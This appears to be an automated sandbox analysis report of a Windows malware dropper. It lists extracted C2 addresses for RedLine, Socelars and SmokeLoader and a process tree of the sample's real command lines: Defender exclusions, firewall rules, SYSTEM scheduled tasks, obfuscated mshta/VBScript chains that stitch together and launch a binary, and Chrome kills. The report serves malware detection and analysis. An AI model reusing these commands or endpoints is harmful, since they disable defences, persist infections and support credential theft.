Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    100s
  • max time network
    356s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    10-11-2021 14:52

General

  • Target

    0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe

  • Size

    5.6MB

  • MD5

    a121db3e0809289a5c41c44958ff6fa0

  • SHA1

    fd40bbe6eaeea4004046f65a8c647fabb35e1742

  • SHA256

    0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd

  • SHA512

    0e4af224ea67c07bdce0bae3b4040d900e2c011557ef55d8d0e68d596826561a8d4f3b553cc3290cf60e87ccee975deb65c1de9553fabfee5f67268935d8081f

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

ANI

C2

194.104.136.5:46013

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 17 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 8 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2660
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2616
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:2552
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:4704
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2336
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2328
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1904
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1320
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1312
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1104
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:372
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:1012
                        • C:\Users\Admin\AppData\Local\Temp\0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
                          "C:\Users\Admin\AppData\Local\Temp\0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3652
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:652
                            • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:1572
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                4⤵
                                  PID:2020
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3708
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1192
                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20109b9e174d0fc.exe
                                    Fri20109b9e174d0fc.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3980
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1168
                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8239F27\Fri20ee0a6fe195bd09.exe
                                    Fri20ee0a6fe195bd09.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3684
                                    • C:\Users\Admin\Pictures\Adobe Films\SyZN3DU4OVOwfugKVgnPT9Rr.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\SyZN3DU4OVOwfugKVgnPT9Rr.exe"
                                      6⤵
                                        PID:3672
                                      • C:\Users\Admin\Pictures\Adobe Films\nHwrSLUpzAX7gYNUdIqAly6O.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\nHwrSLUpzAX7gYNUdIqAly6O.exe"
                                        6⤵
                                          PID:4160
                                        • C:\Users\Admin\Pictures\Adobe Films\1KpU1TtXI_ZlafRG3CvzfZK7.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\1KpU1TtXI_ZlafRG3CvzfZK7.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4656
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                            7⤵
                                              PID:3844
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 552
                                              7⤵
                                              • Program crash
                                              PID:196
                                          • C:\Users\Admin\Pictures\Adobe Films\D5fJE32FpstkplJDMJc35e0x.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\D5fJE32FpstkplJDMJc35e0x.exe"
                                            6⤵
                                              PID:4588
                                            • C:\Users\Admin\Pictures\Adobe Films\o4zFvO383MuBSBFzFasRpRcw.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\o4zFvO383MuBSBFzFasRpRcw.exe"
                                              6⤵
                                                PID:4696
                                              • C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe"
                                                6⤵
                                                  PID:2976
                                                  • C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe"
                                                    7⤵
                                                      PID:1328
                                                  • C:\Users\Admin\Pictures\Adobe Films\eGki8CFZp5SQ2f4V6KybX9MX.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\eGki8CFZp5SQ2f4V6KybX9MX.exe"
                                                    6⤵
                                                      PID:4540
                                                      • C:\Users\Admin\Pictures\Adobe Films\eGki8CFZp5SQ2f4V6KybX9MX.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\eGki8CFZp5SQ2f4V6KybX9MX.exe"
                                                        7⤵
                                                          PID:4600
                                                      • C:\Users\Admin\Pictures\Adobe Films\1eMnL1tpomOzYwxwc1dsaYCP.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\1eMnL1tpomOzYwxwc1dsaYCP.exe"
                                                        6⤵
                                                          PID:1044
                                                        • C:\Users\Admin\Pictures\Adobe Films\dIsYqLv_fdSQv7r7qsBnoiOV.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\dIsYqLv_fdSQv7r7qsBnoiOV.exe"
                                                          6⤵
                                                            PID:1048
                                                            • C:\Users\Admin\Documents\CO603r3RnHYs3MMlklprJuXO.exe
                                                              "C:\Users\Admin\Documents\CO603r3RnHYs3MMlklprJuXO.exe"
                                                              7⤵
                                                                PID:5708
                                                                • C:\Users\Admin\Pictures\Adobe Films\XeY30wwfk9RSXPI66_oScl8n.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\XeY30wwfk9RSXPI66_oScl8n.exe"
                                                                  8⤵
                                                                    PID:4560
                                                                  • C:\Users\Admin\Pictures\Adobe Films\kNYQh9SPfif23Mm3GEH8B2nE.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\kNYQh9SPfif23Mm3GEH8B2nE.exe"
                                                                    8⤵
                                                                      PID:5692
                                                                    • C:\Users\Admin\Pictures\Adobe Films\GaT_muhuWz8D1MdI7DewRnQs.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\GaT_muhuWz8D1MdI7DewRnQs.exe"
                                                                      8⤵
                                                                        PID:5852
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                          9⤵
                                                                            PID:6228
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /f /im chrome.exe
                                                                              10⤵
                                                                              • Kills process with taskkill
                                                                              PID:6640
                                                                        • C:\Users\Admin\Pictures\Adobe Films\Ru7Tf7ju0_etA4UozXeiy_VS.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\Ru7Tf7ju0_etA4UozXeiy_VS.exe"
                                                                          8⤵
                                                                            PID:5312
                                                                          • C:\Users\Admin\Pictures\Adobe Films\DFOxTI1ieyUJaelcqOtkrwjg.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\DFOxTI1ieyUJaelcqOtkrwjg.exe"
                                                                            8⤵
                                                                              PID:5252
                                                                            • C:\Users\Admin\Pictures\Adobe Films\UEt20ototDS_Z1lBun9w1G9X.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\UEt20ototDS_Z1lBun9w1G9X.exe"
                                                                              8⤵
                                                                                PID:4896
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\UEt20ototDS_Z1lBun9w1G9X.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\UEt20ototDS_Z1lBun9w1G9X.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                  9⤵
                                                                                    PID:6052
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\UEt20ototDS_Z1lBun9w1G9X.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\UEt20ototDS_Z1lBun9w1G9X.exe" ) do taskkill -f -iM "%~NxM"
                                                                                      10⤵
                                                                                        PID:4200
                                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                          11⤵
                                                                                            PID:5576
                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                              12⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4572
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                13⤵
                                                                                                  PID:6268
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                12⤵
                                                                                                  PID:6728
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                    13⤵
                                                                                                      PID:6148
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                        14⤵
                                                                                                          PID:1356
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                          14⤵
                                                                                                            PID:5820
                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                            14⤵
                                                                                                              PID:5172
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill -f -iM "UEt20ototDS_Z1lBun9w1G9X.exe"
                                                                                                        11⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5348
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\leDtJP_lSaY_IE1V0LbdJIWh.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\leDtJP_lSaY_IE1V0LbdJIWh.exe"
                                                                                                  8⤵
                                                                                                    PID:5900
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\YxCwUPtuweaaea3TYtU6M3rI.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\YxCwUPtuweaaea3TYtU6M3rI.exe"
                                                                                                    8⤵
                                                                                                      PID:2192
                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                        9⤵
                                                                                                          PID:4948
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ueNAehvXxLrkzn0j29zn1_JK.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ueNAehvXxLrkzn0j29zn1_JK.exe"
                                                                                                        8⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4416
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-HCEO7.tmp\ueNAehvXxLrkzn0j29zn1_JK.tmp
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-HCEO7.tmp\ueNAehvXxLrkzn0j29zn1_JK.tmp" /SL5="$103FE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\ueNAehvXxLrkzn0j29zn1_JK.exe"
                                                                                                          9⤵
                                                                                                            PID:1956
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-940EB.tmp\DYbALA.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-940EB.tmp\DYbALA.exe" /S /UID=2709
                                                                                                              10⤵
                                                                                                                PID:6604
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\67-12316-bbe-b489b-2046cc3815e7f\Lipesohaka.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\67-12316-bbe-b489b-2046cc3815e7f\Lipesohaka.exe"
                                                                                                                  11⤵
                                                                                                                    PID:6236
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\wsGzM51Iwxejmr1yrUD95gMu.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\wsGzM51Iwxejmr1yrUD95gMu.exe"
                                                                                                              8⤵
                                                                                                                PID:6344
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\wsGzM51Iwxejmr1yrUD95gMu.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\wsGzM51Iwxejmr1yrUD95gMu.exe" -u
                                                                                                                  9⤵
                                                                                                                    PID:6656
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                7⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:3984
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                7⤵
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:4852
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\UZd252GyP5EktBjAuz4P0yv1.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\UZd252GyP5EktBjAuz4P0yv1.exe"
                                                                                                              6⤵
                                                                                                                PID:4592
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\LdPzfZ950SZSXRJ5XiWdvk_f.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\LdPzfZ950SZSXRJ5XiWdvk_f.exe"
                                                                                                                6⤵
                                                                                                                  PID:4480
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\MXsrjlSnqJGz0krTCf7GoBvS.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\MXsrjlSnqJGz0krTCf7GoBvS.exe"
                                                                                                                  6⤵
                                                                                                                    PID:3184
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\mqKyqAEhYOnbkk4ykCo3dE0E.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\mqKyqAEhYOnbkk4ykCo3dE0E.exe"
                                                                                                                    6⤵
                                                                                                                      PID:4812
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe"
                                                                                                                      6⤵
                                                                                                                        PID:4392
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\niEDdiT_JQ6DtC_DiOudsjp7.exe"
                                                                                                                          7⤵
                                                                                                                            PID:4300
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\Dvu4OKQ3u5FjfTHraIGQbTNo.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\Dvu4OKQ3u5FjfTHraIGQbTNo.exe"
                                                                                                                          6⤵
                                                                                                                            PID:3524
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\tFMNYIvQFvGODFelsb0oU0JY.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\tFMNYIvQFvGODFelsb0oU0JY.exe"
                                                                                                                            6⤵
                                                                                                                              PID:4316
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\bllpcYeFuAdbv29t8vWXnp8h.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\bllpcYeFuAdbv29t8vWXnp8h.exe"
                                                                                                                              6⤵
                                                                                                                                PID:2232
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                  7⤵
                                                                                                                                    PID:4504
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                      8⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:5572
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\6d_39r1ohc1azL93QzpGtQhB.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\6d_39r1ohc1azL93QzpGtQhB.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:2192
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\MxUfoMMENr6K9eGvv_S09WHN.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\MxUfoMMENr6K9eGvv_S09WHN.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:4148
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                        7⤵
                                                                                                                                          PID:2316
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                          7⤵
                                                                                                                                            PID:1304
                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                            7⤵
                                                                                                                                              PID:3756
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                              7⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:4592
                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                              7⤵
                                                                                                                                                PID:2656
                                                                                                                                              • C:\Windows\System\svchost.exe
                                                                                                                                                "C:\Windows\System\svchost.exe" formal
                                                                                                                                                7⤵
                                                                                                                                                  PID:3952
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5908
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5964
                                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5992
                                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                          8⤵
                                                                                                                                                            PID:6052
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\SkUjIk7XlU2rEaq3AGcLz5DJ.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\SkUjIk7XlU2rEaq3AGcLz5DJ.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:5072
                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:4872
                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\RNKYoCV41gWm_UD_TB15hZtT.exe
                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\RNKYoCV41gWm_UD_TB15hZtT.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:4668
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:3140
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\gAOwwiLH1L6KC_UmeHuPjUNk.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\gAOwwiLH1L6KC_UmeHuPjUNk.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:1900
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\gAOwwiLH1L6KC_UmeHuPjUNk.exe" & exit
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5696
                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                        timeout /t 5
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                        PID:4384
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\KDeGJ7eHa3dxOgWE0DVcTLti.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\KDeGJ7eHa3dxOgWE0DVcTLti.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5792
